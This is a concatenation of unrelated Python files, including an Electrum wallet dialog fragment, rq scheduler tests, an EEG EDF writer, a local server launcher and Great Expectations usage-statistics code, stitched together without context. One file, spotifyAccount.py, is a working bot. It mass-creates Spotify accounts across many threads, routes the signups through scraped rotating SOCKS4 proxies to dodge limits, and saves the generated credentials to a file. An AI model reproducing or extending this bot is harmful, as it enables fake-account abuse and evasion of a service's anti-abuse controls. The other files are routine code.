fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return  # fee left empty, treat it as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = BumpFeeDialog(main_window=self, tx=tx, txid=txid)
d.run()
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = DSCancelDialog(main_window=self, tx=tx, txid=txid)
d.run()
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_(
"The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
test_scheduler.py
|
import os
import time
from datetime import datetime, timedelta
from multiprocessing import Process
from rq import Queue
from rq.compat import utc, PY2
from rq.exceptions import NoSuchJobError
from rq.job import Job
from rq.registry import FinishedJobRegistry, ScheduledJobRegistry
from rq.scheduler import RQScheduler
from rq.utils import current_timestamp
from rq.worker import Worker
from .fixtures import kill_worker, say_hello
from tests import RQTestCase
import mock
class TestScheduledJobRegistry(RQTestCase):
def test_get_jobs_to_enqueue(self):
"""Getting job ids to enqueue from ScheduledJobRegistry."""
queue = Queue(connection=self.testconn)
registry = ScheduledJobRegistry(queue=queue)
timestamp = current_timestamp()
self.testconn.zadd(registry.key, {'foo': 1})
self.testconn.zadd(registry.key, {'bar': timestamp + 10})
self.testconn.zadd(registry.key, {'baz': timestamp + 30})
self.assertEqual(registry.get_jobs_to_enqueue(), ['foo'])
self.assertEqual(registry.get_jobs_to_enqueue(timestamp + 20),
['foo', 'bar'])
def test_get_scheduled_time(self):
"""get_scheduled_time() returns job's scheduled datetime"""
queue = Queue(connection=self.testconn)
registry = ScheduledJobRegistry(queue=queue)
job = Job.create('myfunc', connection=self.testconn)
job.save()
dt = datetime(2019, 1, 1, tzinfo=utc)
registry.schedule(job, datetime(2019, 1, 1, tzinfo=utc))
self.assertEqual(registry.get_scheduled_time(job), dt)
# get_scheduled_time() should also work with job ID
self.assertEqual(registry.get_scheduled_time(job.id), dt)
# registry.get_scheduled_time() raises NoSuchJobError if
# job.id is not found
self.assertRaises(NoSuchJobError, registry.get_scheduled_time, '123')
def test_schedule(self):
"""Adding job with the correct score to ScheduledJobRegistry"""
queue = Queue(connection=self.testconn)
job = Job.create('myfunc', connection=self.testconn)
job.save()
registry = ScheduledJobRegistry(queue=queue)
if PY2:
# On Python 2, datetime needs to have timezone
self.assertRaises(ValueError, registry.schedule, job, datetime(2019, 1, 1))
registry.schedule(job, datetime(2019, 1, 1, tzinfo=utc))
self.assertEqual(self.testconn.zscore(registry.key, job.id),
1546300800) # 2019-01-01 UTC in Unix timestamp
else:
from datetime import timezone
# If we pass in a datetime with no timezone, `schedule()`
# assumes local timezone so depending on your local timezone,
# the timestamp may be different
registry.schedule(job, datetime(2019, 1, 1))
self.assertEqual(self.testconn.zscore(registry.key, job.id),
1546300800 + time.timezone) # 2019-01-01 UTC in Unix timestamp
# Score is always stored in UTC even if datetime is in a different tz
tz = timezone(timedelta(hours=7))
job = Job.create('myfunc', connection=self.testconn)
job.save()
registry.schedule(job, datetime(2019, 1, 1, 7, tzinfo=tz))
self.assertEqual(self.testconn.zscore(registry.key, job.id),
1546300800) # 2019-01-01 UTC in Unix timestamp
class TestScheduler(RQTestCase):
def test_init(self):
"""Scheduler can be instantiated with queues or queue names"""
foo_queue = Queue('foo', connection=self.testconn)
scheduler = RQScheduler([foo_queue, 'bar'], connection=self.testconn)
self.assertEqual(scheduler._queue_names, {'foo', 'bar'})
self.assertEqual(scheduler.status, RQScheduler.Status.STOPPED)
def test_should_reacquire_locks(self):
"""scheduler.should_reacquire_locks works properly"""
queue = Queue(connection=self.testconn)
scheduler = RQScheduler([queue], connection=self.testconn)
self.assertTrue(scheduler.should_reacquire_locks)
scheduler.acquire_locks()
self.assertIsNotNone(scheduler.lock_acquisition_time)
# scheduler.should_reacquire_locks always returns False if
# scheduler.acquired_locks and scheduler._queue_names are the same
self.assertFalse(scheduler.should_reacquire_locks)
scheduler.lock_acquisition_time = datetime.now() - timedelta(minutes=16)
self.assertFalse(scheduler.should_reacquire_locks)
scheduler._queue_names = set(['default', 'foo'])
self.assertTrue(scheduler.should_reacquire_locks)
scheduler.acquire_locks()
self.assertFalse(scheduler.should_reacquire_locks)
def test_lock_acquisition(self):
"""Test lock acquisition"""
name_1 = 'lock-test-1'
name_2 = 'lock-test-2'
name_3 = 'lock-test-3'
scheduler = RQScheduler([name_1], self.testconn)
self.assertEqual(scheduler.acquire_locks(), {name_1})
self.assertEqual(scheduler._acquired_locks, {name_1})
self.assertEqual(scheduler.acquire_locks(), set([]))
# Only name_2 is returned since name_1 is already locked
scheduler = RQScheduler([name_1, name_2], self.testconn)
self.assertEqual(scheduler.acquire_locks(), {name_2})
self.assertEqual(scheduler._acquired_locks, {name_2})
# When a new lock is successfully acquired, it is added to _acquired_locks
scheduler._queue_names.add(name_3)
self.assertEqual(scheduler.acquire_locks(), {name_3})
self.assertEqual(scheduler._acquired_locks, {name_2, name_3})
def test_lock_acquisition_with_auto_start(self):
"""Test lock acquisition with auto_start=True"""
scheduler = RQScheduler(['auto-start'], self.testconn)
with mock.patch.object(scheduler, 'start') as mocked:
scheduler.acquire_locks(auto_start=True)
self.assertEqual(mocked.call_count, 1)
# If process has started, scheduler.start() won't be called
scheduler = RQScheduler(['auto-start2'], self.testconn)
scheduler._process = 1
with mock.patch.object(scheduler, 'start') as mocked:
scheduler.acquire_locks(auto_start=True)
self.assertEqual(mocked.call_count, 0)
def test_heartbeat(self):
"""Test that heartbeat updates locking keys TTL"""
name_1 = 'lock-test-1'
name_2 = 'lock-test-2'
scheduler = RQScheduler([name_1, name_2], self.testconn)
scheduler.acquire_locks()
locking_key_1 = RQScheduler.get_locking_key(name_1)
locking_key_2 = RQScheduler.get_locking_key(name_2)
with self.testconn.pipeline() as pipeline:
pipeline.expire(locking_key_1, 1000)
pipeline.expire(locking_key_2, 1000)
scheduler.heartbeat()
self.assertEqual(self.testconn.ttl(locking_key_1), 6)
self.assertEqual(self.testconn.ttl(locking_key_2), 6)
# scheduler.stop() releases locks and sets status to STOPPED
scheduler._status = scheduler.Status.WORKING
scheduler.stop()
self.assertFalse(self.testconn.exists(locking_key_1))
self.assertFalse(self.testconn.exists(locking_key_2))
self.assertEqual(scheduler.status, scheduler.Status.STOPPED)
# Heartbeat also works properly for schedulers with a single queue
scheduler = RQScheduler([name_1], self.testconn)
scheduler.acquire_locks()
self.testconn.expire(locking_key_1, 1000)
scheduler.heartbeat()
self.assertEqual(self.testconn.ttl(locking_key_1), 6)
def test_enqueue_scheduled_jobs(self):
"""Scheduler can enqueue scheduled jobs"""
queue = Queue(connection=self.testconn)
registry = ScheduledJobRegistry(queue=queue)
job = Job.create('myfunc', connection=self.testconn)
job.save()
registry.schedule(job, datetime(2019, 1, 1, tzinfo=utc))
scheduler = RQScheduler([queue], connection=self.testconn)
scheduler.acquire_locks()
scheduler.enqueue_scheduled_jobs()
self.assertEqual(len(queue), 1)
# After the scheduled job is enqueued, the registry should be empty
self.assertEqual(len(registry), 0)
# Jobs scheduled in the far future should not be affected
registry.schedule(job, datetime(2100, 1, 1, tzinfo=utc))
scheduler.enqueue_scheduled_jobs()
self.assertEqual(len(queue), 1)
def test_prepare_registries(self):
"""prepare_registries() creates self._scheduled_job_registries"""
foo_queue = Queue('foo', connection=self.testconn)
bar_queue = Queue('bar', connection=self.testconn)
scheduler = RQScheduler([foo_queue, bar_queue], connection=self.testconn)
self.assertEqual(scheduler._scheduled_job_registries, [])
scheduler.prepare_registries([foo_queue.name])
self.assertEqual(scheduler._scheduled_job_registries, [ScheduledJobRegistry(queue=foo_queue)])
scheduler.prepare_registries([foo_queue.name, bar_queue.name])
self.assertEqual(
scheduler._scheduled_job_registries,
[ScheduledJobRegistry(queue=foo_queue), ScheduledJobRegistry(queue=bar_queue)]
)
class TestWorker(RQTestCase):
def test_work_burst(self):
"""worker.work() with scheduler enabled works properly"""
queue = Queue(connection=self.testconn)
worker = Worker(queues=[queue], connection=self.testconn)
worker.work(burst=True, with_scheduler=False)
self.assertIsNone(worker.scheduler)
worker = Worker(queues=[queue], connection=self.testconn)
worker.work(burst=True, with_scheduler=True)
self.assertIsNotNone(worker.scheduler)
@mock.patch.object(RQScheduler, 'acquire_locks')
def test_run_maintenance_tasks(self, mocked):
"""scheduler.acquire_locks() is called only when scheduled is enabled"""
queue = Queue(connection=self.testconn)
worker = Worker(queues=[queue], connection=self.testconn)
worker.run_maintenance_tasks()
self.assertEqual(mocked.call_count, 0)
worker.last_cleaned_at = None
worker.scheduler = RQScheduler([queue], connection=self.testconn)
worker.run_maintenance_tasks()
self.assertEqual(mocked.call_count, 0)
worker.last_cleaned_at = datetime.now()
worker.run_maintenance_tasks()
self.assertEqual(mocked.call_count, 1)
def test_work(self):
queue = Queue(connection=self.testconn)
worker = Worker(queues=[queue], connection=self.testconn)
p = Process(target=kill_worker, args=(os.getpid(), False, 5))
p.start()
queue.enqueue_at(datetime(2019, 1, 1, tzinfo=utc), say_hello)
worker.work(burst=False, with_scheduler=True)
p.join(1)
self.assertIsNotNone(worker.scheduler)
registry = FinishedJobRegistry(queue=queue)
self.assertEqual(len(registry), 1)
class TestQueue(RQTestCase):
def test_enqueue_at(self):
"""queue.enqueue_at() puts job in the scheduled"""
queue = Queue(connection=self.testconn)
registry = ScheduledJobRegistry(queue=queue)
scheduler = RQScheduler([queue], connection=self.testconn)
scheduler.acquire_locks()
# Jobs created using enqueue_at are put in the ScheduledJobRegistry
job = queue.enqueue_at(datetime(2019, 1, 1, tzinfo=utc), say_hello)
self.assertEqual(len(queue), 0)
self.assertEqual(len(registry), 1)
# enqueue_at sets job status to "scheduled"
self.assertTrue(job.get_status() == 'scheduled')
# After enqueue_scheduled_jobs() is called, the registry is empty
# and job is enqueued
scheduler.enqueue_scheduled_jobs()
self.assertEqual(len(queue), 1)
self.assertEqual(len(registry), 0)
def test_enqueue_in(self):
"""queue.enqueue_in() schedules job correctly"""
queue = Queue(connection=self.testconn)
registry = ScheduledJobRegistry(queue=queue)
job = queue.enqueue_in(timedelta(seconds=30), say_hello)
now = datetime.now(utc)
scheduled_time = registry.get_scheduled_time(job)
# Ensure that job is scheduled roughly 30 seconds from now
self.assertTrue(
now + timedelta(seconds=28) < scheduled_time < now + timedelta(seconds=32)
)
|
spotifyAccount.py
|
import platform
import random
import string
import threading
import time
from os import system
import requests
if platform.system() == "Windows": # checking OS
title = "windows"
else:
title = "linux"
def randomName(size=10, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for i in range(size))
def randomPassword(size=14, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for i in range(size))
global maxi
global created
created = 0
errors = 0
class proxy():
def update(self):
while True:
data = ''
urls = ["https://api.proxyscrape.com/?request=getproxies&proxytype=socks4&timeout=10000&ssl=yes"]
for url in urls:
data += requests.get(url).text
self.splited += data.split("\r\n") #scraping and splitting proxies
time.sleep(600)
def get_proxy(self):
random1 = random.choice(self.splited) # choose a random proxy
return random1
def FormatProxy(self):
proxyOutput = {'https' :'socks4://'+self.get_proxy()}
return proxyOutput
def __init__(self):
self.splited = []
threading.Thread(target=self.update).start()
time.sleep(3)
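# Usage sketch: creator() below passes proxy1.FormatProxy() as the `proxies`
# argument of requests, e.g. requests.get(url, proxies=proxy1.FormatProxy()),
# which routes the request through a randomly chosen SOCKS4 proxy from the scraped list.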
proxy1 = proxy()
def creator():
global maxi
global created
global errors
while maxi > created:
if title == "windows":
system("title "+ f"Spotify Account Creator by KevinLage https://github.com/KevinLage/Spotify-Account-Creator Created: {created}/{maxi} Errors:{errors}")
s = requests.session()
email = randomName()
password = randomPassword()
data={
"displayname":"Josh",
"creation_point":"https://login.app.spotify.com?utm_source=spotify&utm_medium=desktop-win32&utm_campaign=organic",
"birth_month":"12",
"email":email + "@gmail.com",
"password":password,
"creation_flow":"desktop",
"platform":"desktop",
"birth_year":"1991",
"iagree":"1",
"key":"4c7a36d5260abca4af282779720cf631",
"birth_day":"17",
"gender":"male",
"password_repeat":password,
"referrer":""
}
try:
r = s.post("https://spclient.wg.spotify.com/signup/public/v1/account/",data=data,proxies=proxy1.FormatProxy())
if '{"status":1,"' in r.text:
open("created.txt", "a+").write(email + "@gmail.com:" + password + "\n")
created += 1
if title == "windows":
system("title "+ f"Spotify Account Creator : {created}/{maxi} Errors:{errors}")
else:
errors += 1
except:
pass
maxi = int(input("How many accounts do you want to create?\n"))
maxthreads = int(input("How many Threads?\n"))
num = 0
while num < maxthreads:
num += 1
threading.Thread(target=creator).start() # Start a creator thread
|
fileIO.py
|
# -*- coding: utf-8 -*-
"""
@author: %(Mikel Val Calvo)s
@email: %(mikel1982mail@gmail.com)
@institution: %(Dpto. de Inteligencia Artificial, Universidad Nacional de Educación a Distancia (UNED))
@DOI: 10.5281/zenodo.3759306
Modified by: Pablo Couso (cousop@gmail.com)
"""
from EDF.writeEDFFile import edf_writter
from multiprocessing import Process
import numpy as np
#import os.remove
class io_manager():
def __init__(self, app): # Receives the full RECORDING application
self.app = app
self.edf = edf_writter(self.app.constants) # Pass in the constants
# Create an EDF file
def create_file(self):
# A new file is created whose name is the path plus the trial number
self.edf.new_file(self.app.constants.PATH+'.edf')# + '_trial_' + str(self.app.constants.running_trial) + '.edf')
# Update the logger text with the path, indicating the file has been created
self.app.log.update_text('* -- USER ' + self.app.constants.PATH + ' CREATED -- *')
# Close the EDF file
def close_file(self):
self.edf.close_file() # The file is closed
# Update the logger text with the path, indicating the file has been closed
self.app.log.update_text('* -- USER ' + self.app.constants.PATH + ' CLOSED -- *')
# Append data to the file
#### saving takes a long time; try threads, or keep everything in an allData variable until the recording ends and then write it to the file
def append_to_file(self, all_data_store):
# If the file is enabled, the data stored in the data bank is appended to the file
if self.app.constants.ispath:
if not self.app.constants.headerWritten:
self.edf.append(all_data_store)
# A writer process is created for the EDF file
p = Process(target=self.edf.firstWriteToEDF) # pass the callable itself; calling it here would run it synchronously and give Process a useless target
p.start()
self.app.constants.headerWritten = True
else:
self.edf.writeEDFSamples(all_data_store)
else:
print('* -- EDF file path is needed -- *')
# Create a .txt file for dynamic saving of the signals
'''def create_txt_file(self):
fname = f"tmp{self.app.port[-4:]}.txt"
self.txt_file_path = "RESULTS/"+fname
self.txt_file = open(self.txt_file_path, "a")
def append_to_txt_file(self, data):
transposed_data = np.transpose(data)
np.savetxt(self.txt_file,transposed_data,delimiter=',')
def convert_txt2edf(self):
self.txt_file.close()
with open(self.txt_file_path, "r") as f:
saved_data = np.genfromtxt(f,delimiter=',',unpack=True)
print(saved_data.shape)
self.append_to_file(saved_data)
def delete_txt_file(self):
self.convert_txt2edf()
self.close_file()
# Deletion still to be implemented
#os.remove(self.txt_file_path)'''
# Write an annotation
def online_annotation(self, notation): # Receives the annotation
# Compute the instant at which the annotation was received:
# current window * seconds per window = current second
# current buffer column % short window size (sampling window) / sample rate = sub-second offset
instant = self.app.constants.running_window*self.app.constants.SECONDS + (self.app.buffer.cur % self.app.buffer.size_short)/self.app.constants.SAMPLE_RATE
duration = -1
event = notation
self.edf.annotation(instant, duration, event) # Create the annotation
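# Worked example (illustrative values only): with SECONDS = 6, SAMPLE_RATE = 250
# and buffer.size_short = 250, an annotation arriving in window 3 at buffer column
# 125 is stamped at 3 * 6 + (125 % 250) / 250 = 18.5 seconds into the recording.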
|
wk8local.py
|
import os
os.environ['WENKU8_LOCAL'] = "True"
import time
import webbrowser
import threading
from error_report import *
try:
from server import *
from manage import logger
except Exception as e:
report_it(e, _exit=True)
local_version = 5009
def open_browser(url, sleep_time=3):
time.sleep(sleep_time)
webbrowser.open(url)
if __name__ == '__main__':
# Start a new thread that waits briefly and then opens the browser
local_url = 'http://localhost:%s/' % local_version
logger.info('The browser will open automatically in 5 seconds.')
logger.info('Please close this window when you are finished.')
logger.info('If it fails to open, refresh the browser or enter "%s" manually.' % local_url)
threading.Thread(target=open_browser, args=(local_url, 5)).start()
# app.run("0.0.0.0", port=int(os.environ.get('PORT', local_version)), debug=False)
run_simple("0.0.0.0", int(os.environ.get('PORT', local_version)), dm)
|
usage_statistics.py
|
import atexit
import copy
import datetime
import json
import logging
import platform
import signal
import sys
import threading
import time
from functools import wraps
from queue import Queue
from typing import Optional
import jsonschema
import requests
from great_expectations import __version__ as ge_version
from great_expectations.core import ExpectationSuite
from great_expectations.core.usage_statistics.anonymizers.anonymizer import Anonymizer
from great_expectations.core.usage_statistics.anonymizers.batch_anonymizer import (
BatchAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.batch_request_anonymizer import (
BatchRequestAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.checkpoint_run_anonymizer import (
CheckpointRunAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.data_docs_site_anonymizer import (
DataDocsSiteAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.datasource_anonymizer import (
DatasourceAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.execution_engine_anonymizer import (
ExecutionEngineAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.expectation_suite_anonymizer import (
ExpectationSuiteAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.store_anonymizer import (
StoreAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.types.base import (
CLISuiteInteractiveFlagCombinations,
)
from great_expectations.core.usage_statistics.anonymizers.validation_operator_anonymizer import (
ValidationOperatorAnonymizer,
)
from great_expectations.core.usage_statistics.schemas import (
anonymized_usage_statistics_record_schema,
)
from great_expectations.core.util import nested_update
from great_expectations.data_context.types.base import CheckpointConfig
STOP_SIGNAL = object()
logger = logging.getLogger(__name__)
_anonymizers = {}
class UsageStatisticsHandler:
def __init__(self, data_context, data_context_id, usage_statistics_url):
self._url = usage_statistics_url
self._data_context_id = data_context_id
self._data_context_instance_id = data_context.instance_id
self._data_context = data_context
self._ge_version = ge_version
self._message_queue = Queue()
self._worker = threading.Thread(target=self._requests_worker, daemon=True)
self._worker.start()
self._datasource_anonymizer = DatasourceAnonymizer(data_context_id)
self._execution_engine_anonymizer = ExecutionEngineAnonymizer(data_context_id)
self._store_anonymizer = StoreAnonymizer(data_context_id)
self._validation_operator_anonymizer = ValidationOperatorAnonymizer(
data_context_id
)
self._data_docs_sites_anonymizer = DataDocsSiteAnonymizer(data_context_id)
self._batch_request_anonymizer = BatchRequestAnonymizer(data_context_id)
self._batch_anonymizer = BatchAnonymizer(data_context_id)
self._expectation_suite_anonymizer = ExpectationSuiteAnonymizer(data_context_id)
self._checkpoint_run_anonymizer = CheckpointRunAnonymizer(data_context_id)
try:
self._sigterm_handler = signal.signal(signal.SIGTERM, self._teardown)
except ValueError:
# if we are not the main thread, we don't get to ask for signal handling.
self._sigterm_handler = None
try:
self._sigint_handler = signal.signal(signal.SIGINT, self._teardown)
except ValueError:
# if we are not the main thread, we don't get to ask for signal handling.
self._sigint_handler = None
atexit.register(self._close_worker)
def _teardown(self, signum: int, frame):
self._close_worker()
if signum == signal.SIGTERM and self._sigterm_handler:
self._sigterm_handler(signum, frame)
if signum == signal.SIGINT and self._sigint_handler:
self._sigint_handler(signum, frame)
def _close_worker(self):
self._message_queue.put(STOP_SIGNAL)
self._worker.join()
def _requests_worker(self):
session = requests.Session()
while True:
message = self._message_queue.get()
if message == STOP_SIGNAL:
self._message_queue.task_done()
return
try:
res = session.post(self._url, json=message, timeout=2)
logger.debug(
"Posted usage stats: message status " + str(res.status_code)
)
if res.status_code != 201:
logger.debug(
"Server rejected message: ", json.dumps(message, indent=2)
)
except requests.exceptions.Timeout:
logger.debug("Timeout while sending usage stats message.")
except Exception as e:
logger.debug("Unexpected error posting message: " + str(e))
finally:
self._message_queue.task_done()
def build_init_payload(self):
"""Adds information that may be available only after full data context construction, but is useful to
calculate only one time (for example, anonymization)."""
expectation_suites = [
self._data_context.get_expectation_suite(expectation_suite_name)
for expectation_suite_name in self._data_context.list_expectation_suite_names()
]
return {
"platform.system": platform.system(),
"platform.release": platform.release(),
"version_info": str(sys.version_info),
"anonymized_datasources": [
self._datasource_anonymizer.anonymize_datasource_info(
datasource_name, datasource_config
)
for datasource_name, datasource_config in self._data_context.project_config_with_variables_substituted.datasources.items()
],
"anonymized_stores": [
self._store_anonymizer.anonymize_store_info(store_name, store_obj)
for store_name, store_obj in self._data_context.stores.items()
],
"anonymized_validation_operators": [
self._validation_operator_anonymizer.anonymize_validation_operator_info(
validation_operator_name=validation_operator_name,
validation_operator_obj=validation_operator_obj,
)
for validation_operator_name, validation_operator_obj in self._data_context.validation_operators.items()
],
"anonymized_data_docs_sites": [
self._data_docs_sites_anonymizer.anonymize_data_docs_site_info(
site_name=site_name, site_config=site_config
)
for site_name, site_config in self._data_context.project_config_with_variables_substituted.data_docs_sites.items()
],
"anonymized_expectation_suites": [
self._expectation_suite_anonymizer.anonymize_expectation_suite_info(
expectation_suite
)
for expectation_suite in expectation_suites
],
}
def build_envelope(self, message):
message["version"] = "1.0.0"
message["ge_version"] = self._ge_version
message["data_context_id"] = self._data_context_id
message["data_context_instance_id"] = self._data_context_instance_id
message["event_time"] = (
datetime.datetime.now(datetime.timezone.utc).strftime(
"%Y-%m-%dT%H:%M:%S.%f"
)[:-3]
+ "Z"
)
event_duration_property_name: str = f'{message["event"]}.duration'.replace(
".", "_"
)
if hasattr(self, event_duration_property_name):
delta_t: int = getattr(self, event_duration_property_name)
message["event_duration"] = delta_t
return message
@staticmethod
def validate_message(message, schema):
try:
jsonschema.validate(message, schema=schema)
return True
except jsonschema.ValidationError as e:
logger.debug("invalid message: " + str(e))
return False
def send_usage_message(
self,
event: str,
event_payload: Optional[dict] = None,
success: Optional[bool] = None,
):
"""send a usage statistics message."""
# noinspection PyBroadException
try:
message: dict = {
"event": event,
"event_payload": event_payload or {},
"success": success,
}
self.emit(message)
except Exception:
pass
def emit(self, message):
"""
Emit a message.
"""
try:
if message["event"] == "data_context.__init__":
message["event_payload"] = self.build_init_payload()
message = self.build_envelope(message=message)
if not self.validate_message(
message, schema=anonymized_usage_statistics_record_schema
):
return
self._message_queue.put(message)
# noinspection PyBroadException
except Exception as e:
# We *always* tolerate *any* error in usage statistics
logger.debug(e)
def get_usage_statistics_handler(args_array):
try:
# If the object is usage_statistics-capable, then it will have a usage_statistics_handler
handler = getattr(args_array[0], "_usage_statistics_handler", None)
if handler is not None and not isinstance(handler, UsageStatisticsHandler):
logger.debug("Invalid UsageStatisticsHandler found on object.")
handler = None
except IndexError:
# A wrapped method that is not an object; this would be erroneous usage
logger.debug(
"usage_statistics enabled decorator should only be used on data context methods"
)
handler = None
except AttributeError:
# A wrapped method that is not usage_statistics capable
handler = None
except Exception as e:
# An unknown error -- but we still fail silently
logger.debug(
"Unrecognized error when trying to find usage_statistics_handler: " + str(e)
)
handler = None
return handler
def usage_statistics_enabled_method(
func=None, event_name=None, args_payload_fn=None, result_payload_fn=None
):
"""
A decorator for usage statistics which defaults to the less detailed payload schema.
"""
if callable(func):
if event_name is None:
event_name = func.__name__
@wraps(func)
def usage_statistics_wrapped_method(*args, **kwargs):
# if a function like `build_data_docs()` is being called as a `dry_run`
# then we don't want to emit usage_statistics; we just call the function and return its result without sending a usage_stats message
if "dry_run" in kwargs and kwargs["dry_run"]:
return func(*args, **kwargs)
# Set event_payload now so it can be updated below
event_payload = {}
message = {"event_payload": event_payload, "event": event_name}
result = None
time_begin: int = int(round(time.time() * 1000))
try:
if args_payload_fn is not None:
nested_update(event_payload, args_payload_fn(*args, **kwargs))
result = func(*args, **kwargs)
message["success"] = True
except Exception:
message["success"] = False
raise
finally:
if not ((result is None) or (result_payload_fn is None)):
nested_update(event_payload, result_payload_fn(result))
time_end: int = int(round(time.time() * 1000))
delta_t: int = time_end - time_begin
handler = get_usage_statistics_handler(args)
if handler:
event_duration_property_name: str = (
f"{event_name}.duration".replace(".", "_")
)
setattr(handler, event_duration_property_name, delta_t)
handler.emit(message)
delattr(handler, event_duration_property_name)
return result
return usage_statistics_wrapped_method
else:
# noinspection PyShadowingNames
def usage_statistics_wrapped_method_partial(func):
return usage_statistics_enabled_method(
func,
event_name=event_name,
args_payload_fn=args_payload_fn,
result_payload_fn=result_payload_fn,
)
return usage_statistics_wrapped_method_partial
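# Illustrative usage (hypothetical method and event name, not part of this module):
#
# @usage_statistics_enabled_method(event_name="data_context.my_method")
# def my_method(self, ...):
#     ...
#
# Each call then emits a message carrying "event": "data_context.my_method",
# "success": True/False and the call duration in milliseconds, provided the first
# positional argument exposes a _usage_statistics_handler.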
# noinspection PyUnusedLocal
def run_validation_operator_usage_statistics(
data_context,
validation_operator_name,
assets_to_validate,
**kwargs,
):
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
try:
payload["anonymized_operator_name"] = anonymizer.anonymize(
validation_operator_name
)
except TypeError:
logger.debug(
"run_validation_operator_usage_statistics: Unable to create validation_operator_name hash"
)
if data_context._usage_statistics_handler:
# noinspection PyBroadException
try:
batch_anonymizer = data_context._usage_statistics_handler._batch_anonymizer
payload["anonymized_batches"] = [
batch_anonymizer.anonymize_batch_info(batch)
for batch in assets_to_validate
]
except Exception:
logger.debug(
"run_validation_operator_usage_statistics: Unable to create anonymized_batches payload field"
)
return payload
# noinspection SpellCheckingInspection
# noinspection PyUnusedLocal
def save_expectation_suite_usage_statistics(
data_context,
expectation_suite,
expectation_suite_name=None,
**kwargs,
):
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
if expectation_suite_name is None:
if isinstance(expectation_suite, ExpectationSuite):
expectation_suite_name = expectation_suite.expectation_suite_name
elif isinstance(expectation_suite, dict):
expectation_suite_name = expectation_suite.get("expectation_suite_name")
# noinspection PyBroadException
try:
payload["anonymized_expectation_suite_name"] = anonymizer.anonymize(
expectation_suite_name
)
except Exception:
logger.debug(
"save_expectation_suite_usage_statistics: Unable to create anonymized_expectation_suite_name payload field"
)
return payload
def edit_expectation_suite_usage_statistics(
data_context: "DataContext", # noqa: F821
expectation_suite_name: str,
interactive_mode: Optional[CLISuiteInteractiveFlagCombinations] = None,
):
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
if interactive_mode is None:
payload = {}
else:
payload = copy.deepcopy(interactive_mode.value)
# noinspection PyBroadException
try:
payload["anonymized_expectation_suite_name"] = anonymizer.anonymize(
expectation_suite_name
)
except Exception:
logger.debug(
"edit_expectation_suite_usage_statistics: Unable to create anonymized_expectation_suite_name payload field"
)
return payload
def add_datasource_usage_statistics(data_context, name, **kwargs):
if not data_context._usage_statistics_handler:
return {}
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
# noinspection PyBroadException
try:
datasource_anonymizer = (
data_context._usage_statistics_handler._datasource_anonymizer
)
except Exception:
datasource_anonymizer = DatasourceAnonymizer(data_context_id)
payload = {}
# noinspection PyBroadException
try:
payload = datasource_anonymizer.anonymize_datasource_info(name, kwargs)
except Exception:
logger.debug(
"add_datasource_usage_statistics: Unable to create add_datasource_usage_statistics payload field"
)
return payload
# noinspection SpellCheckingInspection
def get_batch_list_usage_statistics(data_context, *args, **kwargs):
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
